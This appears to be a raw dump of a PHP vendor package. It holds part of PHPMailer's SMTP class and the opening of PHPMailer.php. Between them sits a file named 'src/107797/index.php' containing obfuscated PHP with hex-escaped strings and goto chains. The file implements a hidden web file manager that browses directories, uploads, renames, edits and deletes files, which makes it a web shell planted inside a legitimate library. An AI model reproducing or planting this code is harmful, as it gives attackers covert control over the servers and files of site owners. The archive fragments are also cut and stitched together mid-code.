generate error $this->setError('Already connected to a server'); return false; } if (empty($port)) { $port = self::DEFAULT_PORT; } // Connect to the SMTP server $this->edebug( "Connection: opening to $host:$port, timeout=$timeout, options=" . (count($options) > 0 ? var_export($options, true) : 'array()'), self::DEBUG_CONNECTION ); $errno = 0; $errstr = ''; if ($streamok) { $socket_context = stream_context_create($options); set_error_handler([$this, 'errorHandler']); $this->smtp_conn = stream_socket_client( $host . ':' . $port, $errno, $errstr, $timeout, STREAM_CLIENT_CONNECT, $socket_context ); restore_error_handler(); } else { //Fall back to fsockopen which should work in more places, but is missing some features $this->edebug( 'Connection: stream_socket_client not available, falling back to fsockopen', self::DEBUG_CONNECTION ); set_error_handler([$this, 'errorHandler']); $this->smtp_conn = fsockopen( $host, $port, $errno, $errstr, $timeout ); restore_error_handler(); } // Verify we connected properly if (!is_resource($this->smtp_conn)) { $this->setError( 'Failed to connect to server', '', (string) $errno, $errstr ); $this->edebug( 'SMTP ERROR: ' . $this->error['error'] . ": $errstr ($errno)", self::DEBUG_CLIENT ); return false; } $this->edebug('Connection: opened', self::DEBUG_CONNECTION); // SMTP server can take longer to respond, give longer timeout for first read // Windows does not have support for this timeout function if (strpos(PHP_OS, 'WIN') !== 0) { $max = (int) ini_get('max_execution_time'); // Don't bother if unlimited if (0 !== $max && $timeout > $max) { @set_time_limit($timeout); } stream_set_timeout($this->smtp_conn, $timeout, 0); } // Get any announcement $announce = $this->get_lines(); $this->edebug('SERVER -> CLIENT: ' . $announce, self::DEBUG_SERVER); return true; } /** * Initiate a TLS (encrypted) session. * * @return bool */ public function startTLS() { if (!$this->sendCommand('STARTTLS', 'STARTTLS', 220)) { return false; } //Allow the best TLS version(s) we can $crypto_method = STREAM_CRYPTO_METHOD_TLS_CLIENT; //PHP 5.6.7 dropped inclusion of TLS 1.1 and 1.2 in STREAM_CRYPTO_METHOD_TLS_CLIENT //so add them back in manually if we can if (defined('STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT')) { $crypto_method |= STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT; $crypto_method |= STREAM_CRYPTO_METHOD_TLSv1_1_CLIENT; } // Begin encrypted connection set_error_handler([$this, 'errorHandler']); $crypto_ok = stream_socket_enable_crypto( $this->smtp_conn, true, $crypto_method ); restore_error_handler(); return (bool) $crypto_ok; } /** * Perform SMTP authentication. * Must be run after hello(). * * @see hello() * * @param string $username The user name * @param string $password The password * @param string $authtype The auth type (CRAM-MD5, PLAIN, LOGIN, XOAUTH2) * @param OAuth $OAuth An optional OAuth instance for XOAUTH2 authentication * * @return bool True if successfully authenticated */ public function authenticate( $username, $password, $authtype = null, $OAuth = null ) { if (!$this->server_caps) { $this->setError('Authentication is not allowed before HELO/EHLO'); return false; } if (array_key_exists('EHLO', $this->server_caps)) { // SMTP extensions are available; try to find a proper authentication method if (!array_key_exists('AUTH', $this->server_caps)) { $this->setError('Authentication is not allowed at this stage'); // 'at this stage' means that auth may be allowed after the stage changes // e.g. after STARTTLS return false; } $this->edebug('Auth method requested: ' . ($authtype ?: 'UNSPECIFIED'), self::DEBUG_LOWLEVEL); $this->edebug( 'Auth methods available on the server: ' . implode(',', $this->server_caps['AUTH']), self::DEBUG_LOWLEVEL ); //If we have requested a specific auth type, check the server supports it before trying others if (null !== $authtype && !in_array($authtype, $this->server_caps['AUTH'], true)) { $this->edebug('Requested auth method not available: ' . $authtype, self::DEBUG_LOWLEVEL); $authtype = null; } if (empty($authtype)) { //If no auth mechanism is specified, attempt to use these, in this order //Try CRAM-MD5 first as it's more secure than the others foreach (['CRAM-MD5', 'LOGIN', 'PLAIN', 'XOAUTH2'] as $method) { if (in_array($method, $this->server_caps['AUTH'], true)) { $authtype = $method; break; } } if (empty($authtype)) { $this->setError('No supported authentication methods found'); return false; } $this->edebug('Auth method selected: ' . $authtype, self::DEBUG_LOWLEVEL); } if (!in_array($authtype, $this->server_caps['AUTH'], true)) { $this->setError("The requested authentication method \"$authtype\" is not supported by the server"); return false; } } elseif (empty($authtype)) { $authtype = 'LOGIN'; } switch ($authtype) { case 'PLAIN': // Start authentication if (!$this->sendCommand('AUTH', 'AUTH PLAIN', 334)) { return false; } // Send encoded username and password if (!$this->sendCommand( 'User & Password', base64_encode("\0" . $username . "\0" . $password), 235 ) ) { return false; } break; case 'LOGIN': // Start authentication if (!$this->sendCommand('AUTH', 'AUTH LOGIN', 334)) { return false; } if (!$this->sendCommand('Username', base64_encode($username), 334)) { return false; } if (!$this->sendCommand('Password', base64_encode($password), 235)) { return false; } break; case 'CRAM-MD5': // Start authentication if (!$this->sendCommand('AUTH CRAM-MD5', 'AUTH CRAM-MD5', 334)) { return false; } // Get the challenge $challenge = base64_decode(substr($this->last_reply, 4)); // Build the response $response = $username . ' ' . $this->hmac($challenge, $password); // send encoded credentials return $this->sendCommand('Username', base64_encode($response), 235); case 'XOAUTH2': //The OAuth instance must be set up prior to requesting auth. if (null === $OAuth) { return false; } $oauth = $OAuth->getOauth64(); // Start authentication if (!$this->sendCommand('AUTH', 'AUTH XOAUTH2 ' . $oauth, 235)) { return false; } break; default: $this->setError("Authentication method \"$authtype\" is not supported"); return false; } return true; } /** * Calculate an MD5 HMAC hash. * Works like hash_hmac('md5', $data, $key) * in case that function is not available. * * @param string $data The data to hash * @param string $key The key to hash with * * @return string */ protected function hmac($data, $key) { if (function_exists('hash_hmac')) { return hash_hmac('md5', $data, $key); } // The following borrowed from // http://php.net/manual/en/function.mhash.php#27225 // RFC 2104 HMAC implementation for php. // Creates an md5 HMAC. // Eliminates the need to install mhash to compute a HMAC // by Lance Rushing $bytelen = 64; // byte length for md5 if (strlen($key) > $bytelen) { $key = pack('H*', md5($key)); } $key = str_pad($key, $bytelen, chr(0x00)); $ipad = str_pad('', $bytelen, chr(0x36)); $opad = str_pad('', $bytelen, chr(0x5c)); $k_ipad = $key ^ $ipad; $k_opad = $key ^ $opad; return md5($k_opad . pack('H*', md5($k_ipad . $data))); } /** * Check connection state. * * @return bool True if connected */ public function connected() { if (is_resource($this->smtp_conn)) { $sock_status = stream_get_meta_data($this->smtp_conn); if ($sock_status['eof']) { // The socket is valid but we are not connected $this->edebug( 'SMTP NOTICE: EOF caught while checking if connected', self::DEBUG_CLIENT ); $this->close(); return false; } return true; // everything looks good } return false; } /** * Close the socket and clean up the state of the class. * Don't use this function without first trying to use QUIT. * * @see quit() */ public function close() { $this->setError(''); $this->server_caps = null; $this->helo_rply = null; if (is_resource($this->smtp_conn)) { // close the connection and cleanup fclose($this->smtp_conn); $this->smtp_conn = null; //Makes for cleaner serialization $this->edebug('Connection: closed', self::DEBUG_CONNECTION); } } /** * Send an SMTP DATA command. * Issues a data command and sends the msg_data to the server, * finializing the mail transaction. $msg_data is the message * that is to be send with the headers. Each header needs to be * on a single line followed by a with the message headers * and the message body being separated by an additional . * Implements RFC 821: DATA . * * @param string $msg_data Message data to send * * @return bool */ public function data($msg_data) { //This will use the standard timelimit if (!$this->sendCommand('DATA', 'DATA', 354)) { return false; } /* The server is ready to accept data! * According to rfc821 we should not send more than 1000 characters on a single line (including the LE) * so we will break the data up into lines by \r and/or \n then if needed we will break each of those into * smaller lines to fit within the limit. * We will also look for lines that start with a '.' and prepend an additional '.'. * NOTE: this does not count towards line-length limit. */ // Normalize line breaks before exploding $lines = explode("\n", str_replace(["\r\n", "\r"], "\n", $msg_data)); /* To distinguish between a complete RFC822 message and a plain message body, we check if the first field * of the first line (':' separated) does not contain a space then it _should_ be a header and we will * process all lines before a blank line as headers. */ $field = substr($lines[0], 0, strpos($lines[0], ':')); $in_headers = false; if (!empty($field) && strpos($field, ' ') === false) { $in_headers = true; } foreach ($lines as $line) { $lines_out = []; if ($in_headers && $line === '') { $in_headers = false; } //Break this line up into several smaller lines if it's too long //Micro-optimisation: isset($str[$len]) is faster than (strlen($str) > $len), while (isset($line[self::MAX_LINE_LENGTH])) { //Working backwards, try to find a space within the last MAX_LINE_LENGTH chars of the line to break on //so as to avoid breaking in the middle of a word $pos = strrpos(substr($line, 0, self::MAX_LINE_LENGTH), ' '); //Deliberately matches both false and 0 if (!$pos) { //No nice break found, add a hard break $pos = self::MAX_LINE_LENGTH - 1; $lines_out[] = substr($line, 0, $pos); $line = substr($line, $pos); } else { //Break at the found point $lines_out[] = substr($line, 0, $pos); //Move along by the amount we dealt with $line = substr($line, $pos + 1); } //If processing headers add a LWSP-char to the front of new line RFC822 section 3.1.1 if ($in_headers) { $line = "\t" . $line; } } $lines_out[] = $line; //Send the lines to the server foreach ($lines_out as $line_out) { //RFC2821 section 4.5.2 if (!empty($line_out) && $line_out[0] === '.') { $line_out = '.' . $line_out; } $this->client_send($line_out . static::LE, 'DATA'); } } //Message data has been sent, complete the command //Increase timelimit for end of DATA command $savetimelimit = $this->Timelimit; $this->Timelimit *= 2; $result = $this->sendCommand('DATA END', '.', 250); $this->recordLastTransactionID(); //Restore timelimit $this->Timelimit = $savetimelimit; return $result; } /** * Send an SMTP HELO or EHLO command. * Used to identify the sending server to the receiving server. * This makes sure that client and server are in a known state. * Implements RFC 821: HELO * and RFC 2821 EHLO. * * @param string $host The host name or IP to connect to * * @return bool */ public function hello($host = '') { //Try extended hello first (RFC 2821) return $this->sendHello('EHLO', $host) or $this->sendHello('HELO', $host); } /** * Send an SMTP HELO or EHLO command. * Low-level implementation used by hello(). * * @param string $hello The HELO string * @param string $host The hostname to say we are * * @return bool * * @see hello() */ protected function sendHello($hello, $host) { $noerror = $this->sendCommand($hello, $hello . ' ' . $host, 250); $this->helo_rply = $this->last_reply; if ($noerror) { $this->parseHelloFields($hello); } else { $this->server_caps = null; } return $noerror; } /** * Parse a reply to HELO/EHLO command to discover server extensions. * In case of HELO, the only parameter that can be discovered is a server name. * * @param string $type `HELO` or `EHLO` */ protected function parseHelloFields($type) { $this->server_caps = []; $lines = explode("\n", $this->helo_rply); foreach ($lines as $n => $s) { //First 4 chars contain response code followed by - or space $s = trim(substr($s, 4)); if (empty($s)) { continue; } $fields = explode(' ', $s); if (!empty($fields)) { if (!$n) { $name = $type; $fields = $fields[0]; } else { $name = array_shift($fields); switch ($name) { case 'SIZE': $fields = ($fields ? $fields[0] : 0); break; case 'AUTH': if (!is_array($fields)) { $fields = []; } break; default: $fields = true; } } $this->server_caps[$name] = $fields; } } } /** * Send an SMTP MAIL command. * Starts a mail transaction from the email address specified in * $from. Returns true if successful or false otherwise. If True * the mail transaction is started and then one or more recipient * commands may be called followed by a data command. * Implements RFC 821: MAIL FROM: . * * @param string $from Source address of this message * * @return bool */ public function mail($from) { $useVerp = ($this->do_verp ? ' XVERP' : ''); return $this->sendCommand( 'MAIL FROM', 'MAIL FROM:<' . $from . '>' . $useVerp, 250 ); } /** * Send an SMTP QUIT command. * Closes the socket if there is no error or the $close_on_error argument is true. * Implements from RFC 821: QUIT . * * @param bool $close_on_error Should the connection close if an error occurs? * * @return bool */ public function quit($close_on_error = true) { $noerror = $this->sendCommand('QUIT', 'QUIT', 221); $err = $this->error; //Save any error if ($noerror || $close_on_error) { $this->close(); $this->error = $err; //Restore any error from the quit command } return $noerror; } /** * Send an SMTP RCPT command. * Sets the TO argument to $toaddr. * Returns true if the recipient was accepted false if it was rejected. * Implements from RFC 821: RCPT TO: . * * @param string $address The address the message is being sent to * @param string $dsn Comma separated list of DSN notifications. NEVER, SUCCESS, FAILURE * or DELAY. If you specify NEVER all other notifications are ignored. * * @return bool */ public function recipient($address, $dsn = '') { if (empty($dsn)) { $rcpt = 'RCPT TO:<' . $address . '>'; } else { $dsn = strtoupper($dsn); $notify = []; if (strpos($dsn, 'NEVER') !== false) { $notify[] = 'NEVER'; } else { foreach (['SUCCESS', 'FAILURE', 'DELAY'] as $value) { if (strpos($dsn, $value) !== false) { $notify[] = $value; } } } $rcpt = 'RCPT TO:<' . $address . '> NOTIFY=' . implode(',', $notify); } return $this->sendCommand( 'RCPT TO', $rcpt, [250, 251] ); } /** * Send an SMTP RSET command. * Abort any transaction that is currently in progress. * Implements RFC 821: RSET . * * @return bool True on success */ public function reset() { return $this->sendCommand('RSET', 'RSET', 250); } /** * Send a command to an SMTP server and check its return code. * * @param string $command The command name - not sent to the server * @param string $commandstring The actual command to send * @param int|array $expect One or more expected integer success codes * * @return bool True on success */ protected function sendCommand($command, $commandstring, $expect) { if (!$this->connected()) { $this->setError("Called $command without being connected"); return false; } //Reject line breaks in all commands if ((strpos($commandstring, "\n") !== false) || (strpos($commandstring, "\r") !== false)) { $this->setError("Command '$command' contained line breaks"); return false; } $this->client_send($commandstring . static::LE, $command); $this->last_reply = $this->get_lines(); // Fetch SMTP code and possible error code explanation $matches = []; if (preg_match('/^([\d]{3})[ -](?:([\d]\\.[\d]\\.[\d]{1,2}) )?/', $this->last_reply, $matches)) { $code = (int) $matches[1]; $code_ex = (count($matches) > 2 ? $matches[2] : null); // Cut off error code from each response line $detail = preg_replace( "/{$code}[ -]" . ($code_ex ? str_replace('.', '\\.', $code_ex) . ' ' : '') . '/m', '', $this->last_reply ); } else { // Fall back to simple parsing if regex fails $code = (int) substr($this->last_reply, 0, 3); $code_ex = null; $detail = substr($this->last_reply, 4); } $this->edebug('SERVER -> CLIENT: ' . $this->last_reply, self::DEBUG_SERVER); if (!in_array($code, (array) $expect, true)) { $this->setError( "$command command failed", $detail, $code, $code_ex ); $this->edebug( 'SMTP ERROR: ' . $this->error['error'] . ': ' . $this->last_reply, self::DEBUG_CLIENT ); return false; } $this->setError(''); return true; } /** * Send an SMTP SAML command. * Starts a mail transaction from the email address specified in $from. * Returns true if successful or false otherwise. If True * the mail transaction is started and then one or more recipient * commands may be called followed by a data command. This command * will send the message to the users terminal if they are logged * in and send them an email. * Implements RFC 821: SAML FROM: . * * @param string $from The address the message is from * * @return bool */ public function sendAndMail($from) { return $this->sendCommand('SAML', "SAML FROM:$from", 250); } /** * Send an SMTP VRFY command. * * @param string $name The name to verify * * @return bool */ public function verify($name) { return $this->sendCommand('VRFY', "VRFY $name", [250, 251]); } /** * Send an SMTP NOOP command. * Used to keep keep-alives alive, doesn't actually do anything. * * @return bool */ public function noop() { return $this->sendCommand('NOOP', 'NOOP', 250); } /** * Send an SMTP TURN command. * This is an optional command for SMTP that this class does not support. * This method is here to make the RFC821 Definition complete for this class * and _may_ be implemented in future. * Implements from RFC 821: TURN . * * @return bool */ public function turn() { $this->setError('The SMTP TURN command is not implemented'); $this->edebug('SMTP NOTICE: ' . $this->error['error'], self::DEBUG_CLIENT); return false; } /** * Send raw data to the server. * * @param string $data The data to send * @param string $command Optionally, the command this is part of, used only for controlling debug output * * @return int|bool The number of bytes sent to the server or false on error */ public function client_send($data, $command = '') { //If SMTP transcripts are left enabled, or debug output is posted online //it can leak credentials, so hide credentials in all but lowest level if (self::DEBUG_LOWLEVEL > $this->do_debug && in_array($command, ['User & Password', 'Username', 'Password'], true)) { $this->edebug('CLIENT -> SERVER: [credentials hidden]', self::DEBUG_CLIENT); } else { $this->edebug('CLIENT -> SERVER: ' . $data, self::DEBUG_CLIENT); } set_error_handler([$this, 'errorHandler']); $result = fwrite($this->smtp_conn, $data); restore_error_handler(); return $result; } /** * Get the latest error. * * @return array */ public function getError() { return $this->error; } /** * Get SMTP extensions available on the server. * * @return array|null */ public function getServerExtList() { return $this->server_caps; } /** * Get metadata about the SMTP server from its HELO/EHLO response. * The method works in three ways, dependent on argument value and current state: * 1. HELO/EHLO has not been sent - returns null and populates $this->error. * 2. HELO has been sent - * $name == 'HELO': returns server name * $name == 'EHLO': returns boolean false * $name == any other string: returns null and populates $this->error * 3. EHLO has been sent - * $name == 'HELO'|'EHLO': returns the server name * $name == any other string: if extension $name exists, returns True * or its options (e.g. AUTH mechanisms supported). Otherwise returns False. * * @param string $name Name of SMTP extension or 'HELO'|'EHLO' * * @return string|bool|null */ public function getServerExt($name) { if (!$this->server_caps) { $this->setError('No HELO/EHLO was sent'); return; } if (!array_key_exists($name, $this->server_caps)) { if ('HELO' === $name) { return $this->server_caps['EHLO']; } if ('EHLO' === $name || array_key_exists('EHLO', $this->server_caps)) { return false; } $this->setError('HELO handshake was used; No information about server extensions available'); return; } return $this->server_caps[$name]; } /** * Get the last reply from the server. * * @return string */ public function getLastReply() { return $this->last_reply; } /** * Read the SMTP server's response. * Either before eof or socket timeout occurs on the operation. * With SMTP we can tell if we have more lines to read if the * 4th character is '-' symbol. If it is a space then we don't * need to read anything else. * * @return string */ protected function get_lines() { // If the connection is bad, give up straight away if (!is_resource($this->smtp_conn)) { return ''; } $data = ''; $endtime = 0; stream_set_timeout($this->smtp_conn, $this->Timeout); if ($this->Timelimit > 0) { $endtime = time() + $this->Timelimit; } $selR = [$this->smtp_conn]; $selW = null; while (is_resource($this->smtp_conn) && !feof($this->smtp_conn)) { //Must pass vars in here as params are by reference if (!stream_select($selR, $selW, $selW, $this->Timelimit)) { $this->edebug( 'SMTP -> get_lines(): timed-out (' . $this->Timeout . ' sec)', self::DEBUG_LOWLEVEL ); break; } //Deliberate noise suppression - errors are handled afterwards $str = @fgets($this->smtp_conn, self::MAX_REPLY_LENGTH); $this->edebug('SMTP INBOUND: "' . trim($str) . '"', self::DEBUG_LOWLEVEL); $data .= $str; // If response is only 3 chars (not valid, but RFC5321 S4.2 says it must be handled), // or 4th character is a space or a line break char, we are done reading, break the loop. // String array access is a significant micro-optimisation over strlen if (!isset($str[3]) || $str[3] === ' ' || $str[3] === "\r" || $str[3] === "\n") { break; } // Timed-out? Log and break $info = stream_get_meta_data($this->smtp_conn); if ($info['timed_out']) { $this->edebug( 'SMTP -> get_lines(): timed-out (' . $this->Timeout . ' sec)', self::DEBUG_LOWLEVEL ); break; } // Now check if reads took too long if ($endtime && time() > $endtime) { $this->edebug( 'SMTP -> get_lines(): timelimit reached (' . $this->Timelimit . ' sec)', self::DEBUG_LOWLEVEL ); break; } } return $data; } /** * Enable or disable VERP address generation. * * @param bool $enabled */ public function setVerp($enabled = false) { $this->do_verp = $enabled; } /** * Get VERP address generation mode. * * @return bool */ public function getVerp() { return $this->do_verp; } /** * Set error messages and codes. * * @param string $message The error message * @param string $detail Further detail on the error * @param string $smtp_code An associated SMTP error code * @param string $smtp_code_ex Extended SMTP code */ protected function setError($message, $detail = '', $smtp_code = '', $smtp_code_ex = '') { $this->error = [ 'error' => $message, 'detail' => $detail, 'smtp_code' => $smtp_code, 'smtp_code_ex' => $smtp_code_ex, ]; } /** * Set debug output method. * * @param string|callable $method The name of the mechanism to use for debugging output, or a callable to handle it */ public function setDebugOutput($method = 'echo') { $this->Debugoutput = $method; } /** * Get debug output method. * * @return string */ public function getDebugOutput() { return $this->Debugoutput; } /** * Set debug output level. * * @param int $level */ public function setDebugLevel($level = 0) { $this->do_debug = $level; } /** * Get debug output level. * * @return int */ public function getDebugLevel() { return $this->do_debug; } /** * Set SMTP timeout. * * @param int $timeout The timeout duration in seconds */ public function setTimeout($timeout = 0) { $this->Timeout = $timeout; } /** * Get SMTP timeout. * * @return int */ public function getTimeout() { return $this->Timeout; } /** * Reports an error number and string. * * @param int $errno The error number returned by PHP * @param string $errmsg The error message returned by PHP * @param string $errfile The file the error occurred in * @param int $errline The line number the error occurred on */ protected function errorHandler($errno, $errmsg, $errfile = '', $errline = 0) { $notice = 'Connection failed.'; $this->setError( $notice, $errmsg, (string) $errno ); $this->edebug( "$notice Error #$errno: $errmsg [$errfile line $errline]", self::DEBUG_CONNECTION ); } /** * Extract and return the ID of the last SMTP transaction based on * a list of patterns provided in SMTP::$smtp_transaction_id_patterns. * Relies on the host providing the ID in response to a DATA command. * If no reply has been received yet, it will return null. * If no pattern was matched, it will return false. * * @return bool|string|null */ protected function recordLastTransactionID() { $reply = $this->getLastReply(); if (empty($reply)) { $this->last_smtp_transaction_id = null; } else { $this->last_smtp_transaction_id = false; foreach ($this->smtp_transaction_id_patterns as $smtp_transaction_id_pattern) { if (preg_match($smtp_transaction_id_pattern, $reply, $matches)) { $this->last_smtp_transaction_id = trim($matches[1]); break; } } } return $this->last_smtp_transaction_id; } /** * Get the queue/transaction ID of the last SMTP transaction * If no reply has been received yet, it will return null. * If no pattern was matched, it will return false. * * @return bool|string|null * * @see recordLastTransactionID() */ public function getLastTransactionID() { return $this->last_smtp_transaction_id; } } PK@fZ'e^e^(phpmailer/phpmailer/src/107797/index.phpnu[= 1024 ? round($Ruwa7 / 1024, 2) . "\x4d\x42" : round($Ruwa7, 2) . "\113\x42"; goto Zn2LR; VuZB1: } goto U3vJT; fsv2d: $mx_QY = $_FILES["\x75"]["\x74\x6d\160\x5f\156\x61\155\x65"]; goto cXN87; ca6lB: if (move_uploaded_file($mx_QY, $AJ_qB)) { goto hb31x; } goto tKHYa; b9k9N: echo "\x3c\163\143\x72\151\160\x74\x3e\141\154\x65\162\x74\x28\47\122\145\x6e\x61\155\x65\40\x73\165\143\x63\145\163\163\x66\x75\x6c\41\47\x29\73\x20\x70\157\163\164\104\151\162\x28\47" . addslashes($jwra1) . "\x27\51\x3b\x3c\x2f\x73\x63\162\x69\160\164\76"; goto SR4KD; sVT9y: foreach ($MPDY4 as $jS768 => $VqABq) { goto N7nbR; m_1bf: fmL3L: goto R4zDp; I_KB2: echo "\x3c\x61\x20\x68\162\145\x66\x3d\42\152\x61\166\x61\163\x63\x72\151\160\164\72\166\157\x69\x64\50\60\x29\73\x22\40\x6f\156\x63\154\x69\143\153\75\42\x70\x6f\x73\164\x44\151\x72\50\x27" . addslashes($Bikpq) . "\x27\51\x22\x3e{$VqABq}\x3c\x2f\x61\76\57"; goto toWLe; N7nbR: if (!($VqABq == '' && $jS768 == 0)) { goto fmL3L; } goto jwRVb; k4jBy: goto A3_Rp; goto m_1bf; jwRVb: echo "\x3c\x61\40\150\x72\145\x66\x3d\42\152\141\x76\x61\163\143\162\x69\x70\164\x3a\x76\x6f\x69\144\50\x30\x29\73\x22\40\157\156\x63\x6c\x69\x63\x6b\75\42\160\x6f\x73\x74\x44\151\162\50\x27\57\47\51\x22\x3e\x2f\74\57\141\76"; goto k4jBy; R4zDp: $Bikpq = implode("\x2f", array_slice($MPDY4, 0, $jS768 + 1)); goto I_KB2; toWLe: A3_Rp: goto dIho2; dIho2: } goto GETW1; Hu048: if (!(isset($_POST["\163"]) && isset($_FILES["\x75"]) && $_FILES["\x75"]["\x65\162\x72\157\x72"] == 0)) { goto ZmOwt; } goto jaAey; f23X8: o5nIE: goto b9k9N; J80wQ: if (file_exists($VsrER) && is_writable($VsrER)) { goto alxCB; } goto fPtIT; aVGj0: echo "\x3c\164\x61\142\x6c\x65\76"; goto IhSH_; SR4KD: GX5j_: goto ypsAk; aCjEa: if (file_exists($VsrER) && is_writable($VsrER) && unlink($VsrER)) { goto sQi4Y; } goto ShEwF; cnS8u: $X5msN = $jwra1 . "\x2f" . $_POST["\156\145\167"]; goto Bopa2; Y0Ej1: k0TpW: goto dj752; oOnfr: $J4w6Y = str_replace("\134", "\x2f", $J4w6Y); goto lo4MY; lo4MY: $MPDY4 = explode("\x2f", $J4w6Y); goto hBnWX; Tgn2N: if ($E0cGM !== false) { goto gw2IV; } goto DRxMG; Aybqm: yhImi: goto VV8bR; BfHFg: if (isset($_POST["\x6e\x65\x77"]) && !empty($_POST["\x6e\x65\x77"])) { goto sbmkJ; } goto oqrwr; aDA9O: echo base64_encode($J4w6Y); goto qcduo; GETW1: Zyq5q: goto I_Xp9; KjL0z: Nd9hX: goto ftIXW; bHAf3: goto yhImi; goto YTTne; IhSH_: echo "\74\x74\x72\76\x3c\x74\x68\76\106\151\154\x65\57\x46\x6f\154\x64\145\162\40\x4e\141\155\x65\74\x2f\164\x68\76\x3c\x74\150\76\123\x69\x7a\x65\74\x2f\x74\150\x3e\74\164\150\x3e\101\143\164\x69\x6f\156\74\x2f\x74\x68\x3e\74\57\x74\162\76"; goto I3vML; PK4NN: RTpYr: goto SmBGf; uuftl: goto mgQ_G; goto zbrYI; fPtIT: echo "\x3c\163\143\162\x69\x70\x74\76\141\x6c\x65\162\x74\x28\x27\x45\x64\151\x74\x20\x66\141\x69\x6c\x65\144\x20\x6f\x72\x20\156\157\40\x70\x65\x72\x6d\151\x73\x73\x69\x6f\x6e\x21\47\51\x3b\40\x70\x6f\163\164\104\x69\x72\x28\x27" . addslashes($fSwuA) . "\x27\51\73\x3c\x2f\x73\x63\162\151\x70\164\x3e"; goto bHAf3; I3vML: foreach ($E0cGM as $qCRhq) { goto Q_b71; mDx2I: echo "\x3c\164\162\x3e\74\164\144\x3e\74\x61\x20\x68\162\145\x66\75\42\152\x61\x76\x61\163\x63\x72\x69\x70\164\x3a\166\157\151\144\50\x30\x29\73\42\x20\x6f\156\x63\x6c\x69\x63\x6b\75\42\x70\x6f\x73\164\104\x69\162\x28\x27" . addslashes($J4w6Y . "\x2f" . $qCRhq) . "\47\51\x22\x3e{$qCRhq}\74\x2f\141\x3e\x3c\x2f\164\144\x3e\x3c\x74\x64\x3e\x2d\55\x3c\x2f\164\x64\x3e\74\x74\144\76\116\x4f\x4e\x45\74\x2f\164\x64\x3e\x3c\57\164\x72\76"; goto YnF5z; Q_b71: if (!(!is_dir($J4w6Y . "\x2f" . $qCRhq) || $qCRhq == "\56" || $qCRhq == "\56\x2e")) { goto RqMXU; } goto Whn5w; Whn5w: goto S1zde; goto t3B6X; t3B6X: RqMXU: goto mDx2I; YnF5z: S1zde: goto Dmqxu; Dmqxu: } goto ewtkK; y1Xyw: nKSiw: goto WIDh1; UMbkl: goto sqWRE; goto BAB6u; qcduo: echo "\42\76\15\xa\x20\40\x20\x20\x20\40\40\x20\74\x2f\146\x6f\x72\x6d\76\15\xa\x20\40\x20\x20\x3c\57\144\x69\x76\x3e\xd\xa\74\57\142\x6f\144\171\76\xd\xa\74\x2f\150\x74\155\x6c\x3e"; ?>PK@fZ؜ %phpmailer/phpmailer/src/PHPMailer.phpnu[ * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) * @copyright 2012 - 2019 Marcus Bointon * @copyright 2010 - 2012 Jim Jagielski * @copyright 2004 - 2009 Andy Prevost * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License * @note This program is distributed in the hope that it will be useful - WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. */ namespace PHPMailer\PHPMailer; /** * PHPMailer - PHP email creation and transport class. * * @author Marcus Bointon (Synchro/coolbru) * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) */ class PHPMailer { const CHARSET_ASCII = 'us-ascii'; const CHARSET_ISO88591 = 'iso-8859-1'; const CHARSET_UTF8 = 'utf-8'; const CONTENT_TYPE_PLAINTEXT = 'text/plain'; const CONTENT_TYPE_TEXT_CALENDAR = 'text/calendar'; const CONTENT_TYPE_TEXT_HTML = 'text/html'; const CONTENT_TYPE_MULTIPART_ALTERNATIVE = 'multipart/alternative'; const CONTENT_TYPE_MULTIPART_MIXED = 'multipart/mixed'; const CONTENT_TYPE_MULTIPART_RELATED = 'multipart/related'; const ENCODING_7BIT = '7bit'; const ENCODING_8BIT = '8bit'; const ENCODING_BASE64 = 'base64'; const ENCODING_BINARY = 'binary'; const ENCODING_QUOTED_PRINTABLE = 'quoted-printable'; const ENCRYPTION_STARTTLS = 'tls'; const ENCRYPTION_SMTPS = 'ssl'; const ICAL_METHOD_REQUEST = 'REQUEST'; const ICAL_METHOD_PUBLISH = 'PUBLISH'; const ICAL_METHOD_REPLY = 'REPLY'; const ICAL_METHOD_ADD = 'ADD'; const ICAL_METHOD_CANCEL = 'CANCEL'; const ICAL_METHOD_REFRESH = 'REFRESH'; const ICAL_METHOD_COUNTER = 'COUNTER'; const ICAL_METHOD_DECLINECOUNTER = 'DECLINECOUNTER'; /** * Email priority. * Options: null (default), 1 = High, 3 = Normal, 5 = low. * When null, the header is not set at all. * * @var int */ public $Priority; /** * The character set of the message. * * @var string */ public $CharSet = self::CHARSET_ISO88591; /** * The MIME Content-type of the message. * * @var string */ public $ContentType = self::CONTENT_TYPE_PLAINTEXT; /** * The message encoding. * Options: "8bit", "7bit", "binary", "base64", and "quoted-printable". * * @var string */ public $Encoding = self::ENCODING_8BIT; /** * Holds the most recent mailer error message. * * @var string */ public $ErrorInfo = ''; /** * The From email address for the message. * * @var string */ public $From = 'root@localhost'; /** * The From name of the message. * * @var string */ public $FromName = 'Root User'; /** * The envelope sender of the message. * This will usually be turned into a Return-Path header by the receiver, * and is the address that bounces will be sent to. * If not empty, will be passed via `-f` to sendmail or as the 'MAIL FROM' value over SMTP. * * @var string */ public $Sender = ''; /** * The Subject of the message. * * @var string */ public $Subject = ''; /** * An HTML or plain text message body. * If HTML then call isHTML(true). * * @var string */ public $Body = ''; /** * The plain-text message body. * This body can be read by mail clients that do not have HTML email * capability such as mutt & Eudora. * Clients that can read HTML will view the normal Body. * * @var string */ public $AltBody = ''; /** * An iCal message part body. * Only supported in simple alt or alt_inline message types * To generate iCal event structures, use classes like EasyPeasyICS or iCalcreator. * * @see http://sprain.ch/blog/downloads/php-class-easypeasyics-create-ical-files-with-php/ * @see http://kigkonsult.se/iCalcreator/ * * @var string */ public $Ical = ''; /** * Value-array of "method" in Contenttype header "text/calendar" * * @var string[] */ protected static $IcalMethods = [ self::ICAL_METHOD_REQUEST, self::ICAL_METHOD_PUBLISH, self::ICAL_METHOD_REPLY, self::ICAL_METHOD_ADD, self::ICAL_METHOD_CANCEL, self::ICAL_METHOD_REFRESH, self::ICAL_METHOD_COUNTER, self::ICAL_METHOD_DECLINECOUNTER, ]; /** * The complete compiled MIME message body. * * @var string */ protected $MIMEBody = ''; /** * The complete compiled MIME message headers. * * @var string */ protected $MIMEHeader = ''; /** * Extra headers that 